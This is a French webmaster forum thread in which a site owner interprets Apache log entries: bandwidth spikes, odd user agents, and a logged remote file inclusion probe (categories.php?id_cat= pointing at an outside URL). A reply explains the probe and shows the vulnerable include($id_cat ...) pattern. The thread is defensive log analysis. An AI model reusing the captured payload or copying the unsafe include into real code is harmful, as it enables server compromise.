Aspirateur de site ?

[SuperCureuil]

Bonsoir tout le monde,

Voilà, depuis quelques temps j'ai un gros problème de consommation de bande passante, du moins si j'en crois le graphe suivant :



Je ne devrais normalement pas avoir de fréquentation us, comprenez donc mon étonnement.

Quand je regarde dans le fichier de logs, je ne remarque rien :twisted: Déjà, j'ai beaucoup de mal à m'y pencher tant les 25000 lignes brutes me rebutent, mais en plus je n'y comprends pas grand chose ...

Comment puis-je retrouver des traces suspectes dans mes logs ? En clair : c'est où et à quoi qu'on voit cela (une aspiration ou autre) ?

Par exemple, si une âme charitable pouvait m'aider à déchiffrer cette ligne, ce serait sympa :

blablabla.com 80.185.202.156 - - [10/Apr/2008:00:16:50 +0200] "GET /img/design/ss_container_module_h.png HTTP/1.1" 200 3855 "http://www.karpeace.com/" "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 5.1; SIMBAR={6FA19361-EDBA-4290-851A-5D9C6240130F}; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"

Que représente la partie en gras ?

EDIT : en cherchant un peu mieux, je me demande si ça ne pourrait pas venir de là :

blablabla.com 90.26.132.29 - - [10/Apr/2008:00:09:16 +0200] "GET /news.xml HTTP/1.1" 200 4187 "-" "veoh-\xe2\xb8\xb3\xe2\xb8\xb40 service (NT 5.1; IE 6.0.2900.2180; en-US Windows)"

C'est quoi ça à votre avis ?

RE-EDIT : aarrrrghh, voilà ce que je découvre à l'instant :

blablabla.com 75.65.124.125 - - [09/Apr/2008:21:34:59 +0200] "GET /categories.php?id_cat=http://phonefamily.chat.ru/images? HTTP/1.1" 301 5961 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"

Y'en a pas mal, et ça ne sert strictement à rien comme tentative ... tentative de quoi au fait ? C'est une injection ça ?

Merci d'avance à ceux qui pourront me me sortir de l'ignorance ,

supercureuil

 

[Benoit1]

Salut, il s'agit visiblement de Awstats, je l'utilise aussi, il intègre en visites US les visiteurs AOL à mon avis (c'est un début d'explication), com AOL est le plus gros FAI...

Il y a peut être d'autres explications (comme des visites venant de moteurs de recherches qui suivent un chemin tortueux pour arriver jusqu'au site)...
Mais je ne les ais point...

 

[bproductiv]

La première ligne c'est dans la chaine qui identifie le navigateur.
La deuxième c'est une requête vers ton flux rss, et la troisième oui c'est une tentative bidon soit pour injecter soit pour spammer tes referers.

 

[webmasterlamogere]

la dernière c'est du RFI (remote function include) : une tentative pour faire exécuter par un script sur ton serveur du code externe. Il doit y avoir un script categories.php qui existe (pas forcément chez toi) qui contient une ligne du style :

include($id_cat . 'un-include.php');

 

[SuperCureuil]

Merci pour vos réponses les wristes !

@ BenoitL : voilà bien une explication censée, je n'avais pas pensé à ça ! C'est effectivement une possibilité.

@ bpproductiv : ok ok ok, j'avais quand même vu qu'il s'agissait d'une requête vers mon flux , c'était plutôt le

veoh-\xe2\xb8\xb3\xe2\xb8\xb40 service (NT 5.1; IE 6.0.2900.2180; en-US Windows)

avec du "en-US" dedans qui me chiffonnait ...

@ webmasterlamogere : il y a bien un script categories.php, mais point d'include de cette façon ! Et puis, je vérifie mes données avant de les utiliser, donc je pense qu'ils peuvent toujours se casser les dents à essayer :mrgreen:

Pour l'instant je vais retenir l'hypothèse de benoitL qui semble pertinente ...

N'empêche que j'ai épluché mes logs jusque tard tard dans la nuit, et on en voit de belles là dedans ... notamment des tentatives d'injection à tout vent. Je pense que je vais bricoler un petit script maison pour éplucher mes logs et réagir en conséquence, si c'est possible

Merci à tous !

@+

supercureuil

 

[techron]

Ces liens peuvent t'être utiles lors de l'analyse de tes logs:

https://www.webrankinfo.com/forum/t/help-blocage-de-site-web-par-ovh-libwww-perl.85154/
https://www.webrankinfo.com/forum/t/libwww-perl-5-69-quelle-est-ce-bot-de-hacker.64945/

 

[SuperCureuil]

Sorry je viens juste de rentrer, je n'ai pas su répondre plus tôt ...

J'ai jeté un oeil sur les post que tu cites et ils sont très intéressants, je te remercie !

Quelle corvée ces logs, mais j'avoue qu'à force d'éplucher pour trouver la petite bête, on y prend goût

Au fait, est-ce qu'il existe des scripts d'analyse de logs en open source et qui fonctionnent à partir d'un fichier qu'on leur bourre dans le tiroir ? Par exemple, j'ai remarqué quelque chose de bizarre dans mes logs, j'édite le fichier et je le refile au script en question qui me dit : autant de réponse 200, autant de 404, telle (plage) ip semble suspecte, telle tentative d'injection, etc ... Si ça n'existe pas, ou pas bien, je m'y colle 8)